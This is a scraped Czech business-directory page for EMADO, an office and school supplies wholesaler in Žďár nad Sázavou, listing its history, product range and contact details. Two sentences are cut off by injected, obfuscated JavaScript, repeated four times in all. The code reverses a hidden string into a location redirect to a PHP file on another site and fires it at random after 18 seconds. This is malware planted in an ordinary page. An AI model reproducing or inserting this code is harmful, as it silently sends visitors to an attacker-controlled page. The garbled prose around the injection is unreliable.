Rainbow page separator

EMADO – kancelářské a školní potřeby

[tab name="Informace"] Největší velkoobchodní a maloobchodní prodejna s kancelářskými potřebami ve Žďáře nad Sázavou. Na trhu působíme již od roku 1995. Od roku 2000 jsme členy sdružení velkoobchodů PARTNER CZECH. Skupina vydává společný katalog kancelářských potřeb a provozuje e-shop: www.p4o.cz PARTNER 4 OFFICE - Partner pro Vaši kancelář. V rámci skupiny PARTNER CZECH nabízíme pro své zákazníky náhradní plnění ZPS dle § 81 zákona č. 435/2004 Sb.

V roce 2019 došlo k přesunu a sloučení maloobchodní prodejny, která se nacházela na náměstí vedle nábytku ve Žďáře n. S. do našeho velkoobchodu a sortiment z té["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to prodejny i nadále zůstal zachován a můžete si jej u nás zakoupit.

V našem velkoobchodě najdete cca 10.000 položek od xerografického papíru přes kancelářské potřeby, školní potřeby, spotřební materiál, drogistické a hygienické zboží, potraviny až po úklidové prostředky. V poslední době je sortiment rozšířen o služby, jako je například výroba razítek, potisk reklamních předmětů a přítisky na kalendáře a diáře. Rozvoz zboží po Žďáře n. S. a okolí registrovaným odběratelům ZDARMA.

Každý měsíc probíhají letákové akce, ve kterých jsou zlevněny, nebo zvýhodněny desítky produktů a můžete si je pořídit za akční ceny. Za nákupy v určité hodnotě lze získat také drobný dárek. KONTAKT: EMADO s.r.o. Jamborova 1530/5 591 01 Žďár nad Sázavou – Vodojem Před prodejnou je přímo ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}točna MHD, za prodejnou neplacené parkoviště, bezbariérový přístup. Tel.: 566 624 875 Mobil: 736 753 682 E-mail: zdar@emado.cz Web: www.p4o.cz Otevírací doba:
  • PO – ČT : 7:00 – 15:30, PÁ - 7:00 - 15:00
IČ: 64827518 [/tab] [end_tabset]